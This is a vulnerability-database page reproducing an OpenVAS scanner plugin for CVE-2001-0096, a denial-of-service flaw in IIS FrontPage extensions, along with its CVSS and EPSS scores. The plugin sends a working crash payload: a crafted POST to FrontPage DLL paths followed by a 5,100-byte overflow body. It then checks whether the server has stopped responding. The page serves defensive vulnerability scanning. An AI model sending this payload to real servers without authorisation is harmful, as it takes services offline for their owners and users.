Lucene search

K
openvasCopyright (C) 2000 John LampeOPENVAS:136141256231010585
HistoryNov 03, 2005 - 12:00 a.m.

Microsoft Internet Information Services (IIS) FrontPage DoS

2005-11-0300:00:00
Copyright (C) 2000 John Lampe
plugins.openvas.org
11

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

6.7 Medium

AI Score

Confidence

Low

0.043 Low

EPSS

Percentile

92.4%

Microsoft IIS, running Frontpage extensions, is vulnerable
to a remote DoS attack usually called the

# SPDX-FileCopyrightText: 2000 John Lampe
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:microsoft:internet_information_services";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10585");
  script_version("2023-10-10T05:05:41+0000");
  script_tag(name:"last_modification", value:"2023-10-10 05:05:41 +0000 (Tue, 10 Oct 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_cve_id("CVE-2001-0096");
  script_name("Microsoft Internet Information Services (IIS) FrontPage DoS");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2000 John Lampe");
  script_family("Denial of Service");
  script_dependencies("gb_microsoft_iis_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("IIS/installed");

  script_tag(name:"solution", value:"The vendor has released updates. Please see the references for more information.");

  script_xref(name:"URL", value:"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-100");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/2144");

  script_tag(name:"summary", value:"Microsoft IIS, running Frontpage extensions, is vulnerable
  to a remote DoS attack usually called the 'malformed web submission' vulnerability.");

  script_tag(name:"impact", value:"An attacker, exploiting this vulnerability, will be able to
  render the service unusable. If this machine serves a business-critical functionality, there
  could be an impact to the business.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("host_details.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

filenames = make_list();

if( http_is_cgi_installed_ka( item:"/_vti_bin/shtml.dll/_vti_rpc", port:port ) ) {
  filenames = make_list( filenames, "shtml.dll/_vti_rpc" );
}

if( http_is_cgi_installed_ka( item:"/_vti_bin/_vti_aut/author.dll", port:port ) ) {
  filenames = make_list( filenames, "_vti_aut/author.dll" );
}

foreach filename( filenames ) {

  soc = http_open_socket( port );
  if( ! soc ) continue;

  url = "/_vti_bin/" + filename;
  req = string("POST ", url, " HTTP/1.1\r\n",
               "MIME-Version: 1.0\r\n",
               "User-Agent: MSFrontPage/4.0\r\n",
               "Host: %25VTTEST%25\r\n",
               "Accept: auth/sicily\r\n",
               "Content-Length: 5058\r\n",
               "Content-Type: application/x-www-form-urlencoded\r\n",
               "X-Vermeer-Content-Type: application/x-www-form-urlencoded\r\n",
               "Connection: Keep-Alive\r\n\r\n");
  send( socket:soc, data:req );
  res = http_recv( socket:soc );
  find_ms = egrep( pattern:"^Server.*IIS.*", string:res );
  if( find_ms ) {
    req2 = string("\r\n\r\n" , "method=open+", crap(length:5100 , data:"A"), "\r\n\r\n");
    send( socket:soc, data:req2 );
    http_close_socket( soc );
  } else {
    http_close_socket( soc );
    exit( 0 );
  }

  soc = http_open_socket( port );
  req = http_get( item:"/", port:port );
  send( socket:soc, data:req );
  http_close_socket( soc );

  soc = http_open_socket( port );
  send( socket:soc, data:req );
  res = recv_line( socket:soc, length:1024 );
  http_close_socket( soc );

  find_200 = egrep( pattern:".*200 *OK*", string:res );
  if( ! find_200 ) {
    report = http_report_vuln_url( port:port, url:url );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 99 );

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

6.7 Medium

AI Score

Confidence

Low

0.043 Low

EPSS

Percentile

92.4%

Related for OPENVAS:136141256231010585